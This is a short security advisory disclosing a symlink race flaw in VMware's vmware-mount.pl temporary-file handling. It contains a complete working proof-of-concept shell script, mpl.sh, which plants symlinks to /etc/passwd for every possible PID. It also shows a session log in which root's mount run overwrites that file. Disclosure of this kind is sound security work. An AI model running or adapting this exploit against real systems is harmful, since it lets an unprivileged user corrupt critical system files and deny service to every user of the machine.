1. Problem description
----------------------
There is symlink vulnerability in the vmware-mount.pl script which comes
with lates VMware.
2. Details
----------
While mounting virtual disk drives using the vmware-mount.pl script, a
temporary file named vmware-mount.pl.PID where PID is the current pid of
the command will be created in an insecure manner. This allows an
attacker to overwrite any local file, if root mounts a VMware's virtual
partition (mounting is usually done as root).
Example:
paul@ps:/tmp > id
uid=500(paul) gid=100(users) Gruppen=100(users),90(firewall)
paul@ps:/tmp > ./mpl.sh
VMware local /etc/passwd DoS
By Ihq.
linking /etc/passwd to /tmp
[+] please wait for root to run vmware-mount.pl
after running vmware-mount.pl:
paul@ps:/tmp > id
uid=500 gid=100(users) Gruppen=100(users),90(firewall)
Obviously the passwd file has been overwritten:
paul@ps:/tmp > cat /etc/passwd
Nr Start Size Type Id Sytem
-- ---------- ---------- ---- -- ------------------------
1 63 2096577 BIOS C Win95 FAT32 (LBA)
I'm not sure, if it is exploitable for priviledge elevation.
3. Impact
---------
Local file corruption.
---------------------- mpl.sh ----------------------
#/bin/bash
declare -i n
declare -i mx
n=2
mx=32767
echo
echo "VMware local /etc/passwd DoS"
echo "By Ihq."
echo
echo " linking /etc/passwd to /tmp"
while test $n -lt $mx ; do
ln -s /etc/passwd /tmp/vmware-mount.pl.$n
n=$(($n + 1))
done
echo "[+] please wait for root to run vmware-mount.pl"
echo
